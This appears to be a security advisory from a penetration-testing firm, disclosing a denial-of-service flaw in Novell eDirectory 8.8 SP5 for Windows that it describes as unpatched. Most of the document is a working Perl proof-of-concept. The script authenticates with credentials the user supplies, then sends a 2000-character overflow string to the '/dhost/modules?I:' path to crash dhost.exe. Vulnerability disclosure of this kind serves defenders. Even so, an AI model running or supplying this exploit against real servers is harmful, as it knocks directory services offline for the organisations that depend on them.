Product:
Novell eDirectory 8.8 sp5 for Windows

---

Vulnerability:
Denial of Service

---

Discussion:
Vulnerability in '/dhost/modules?I:'
Sending long strings to '/dhost/modules?I:' causes a DoS (crashing dhost.exe)
Also in last weeks published another bug in 'modules?L:'
It is not patched yet too…

---

Credits:
HACKATTACK IT SECURITY GmbH
Penetration Testing in Deutschland - Цsterreich - Schweiz
www.hackattack.com

---

Original Advisory
www.hackattack.com

---

PoC:

#!usr\bin\perl
#Vulnerability has found by HACKATTACK

use WWW::Mechanize;

use LWP::Debug qw(+);

use HTTP::Cookies;

$address=$ARGV[0];

if(!$ARGV[0]){

    print "Usage:perl $0 address\n";

exit();
}

$login = "$address/LOGIN_SERVER";

$url = "$address/dhost/";

$module = "modules?I:";

$buffer = "A" x 2000;

$vuln = $module.$buffer;

#Edit the username and password.

      $user = "username";

      $pass = "password"; 

#Edit the username and password.

my $mechanize = WWW::Mechanize->new();

$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));

$mechanize->timeout($url_timeout);

$res = $mechanize->request(HTTP::Request->new('GET', "$login"));

$mechanize->submit_form( 

              form_name => "authenticator", 

              fields    => {        
        
                 usr => $user, 

                 pwd => $pass}, 

                 button => 'Login'); 

$response2 = $mechanize->get("$url$vuln");

About HACKATTACK

HACKATTACK IT SECURITY GmbH is a Penetrationtest and Security Auditing company located in Germany and Austria

More Information about HACKATTACK at
http://www.hackattack.com